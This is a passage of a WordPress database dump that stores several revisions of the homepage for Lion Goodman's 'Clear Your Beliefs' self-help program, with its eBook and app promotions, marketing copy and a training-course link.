style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:01:25', '2014-11-12 00:01:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1682, 2, '2014-11-11 19:03:43', '2014-11-12 00:03:43', '', 'IClearIt-website_sml', '', 'inherit', 'closed', 'open', '', 'iclearit-website_sml', '', '', '2014-11-11 19:03:43', '2014-11-12 00:03:43', '', 1450, 'http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml.jpg', 0, 'attachment', 'image/jpeg', 0),
(1683, 2, '2014-11-11 19:05:39', '2014-11-12 00:05:39', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:18px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-150x150.jpg">\n<p style="text-align: center;margin-top: 8px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:05:39', '2014-11-12 00:05:39', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1684, 2, '2014-11-11 19:07:43', '2014-11-12 00:07:43', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:22px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-150x150.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:07:43', '2014-11-12 00:07:43', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1685, 2, '2014-11-11 19:10:14', '2014-11-12 00:10:14', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:22px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center;margin-top: 8px;font-size: 18px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:10:14', '2014-11-12 00:10:14', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1686, 2, '2014-11-11 19:11:48', '2014-11-12 00:11:48', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:22px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:11:48', '2014-11-12 00:11:48', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1687, 2, '2014-11-11 19:13:20', '2014-11-12 00:13:20', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:28px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: 8px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:13:20', '2014-11-12 00:13:20', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1688, 2, '2014-11-11 19:14:57', '2014-11-12 00:14:57', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="577" height="140" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;margin-top:38px;margin-bottom:0px">Download the free eBook.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x155.jpg">\n<p style="text-align: center; margin-top: 8px; font-size: 18px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman&nbsp;', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-11 19:14:57', '2014-11-12 00:14:57', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
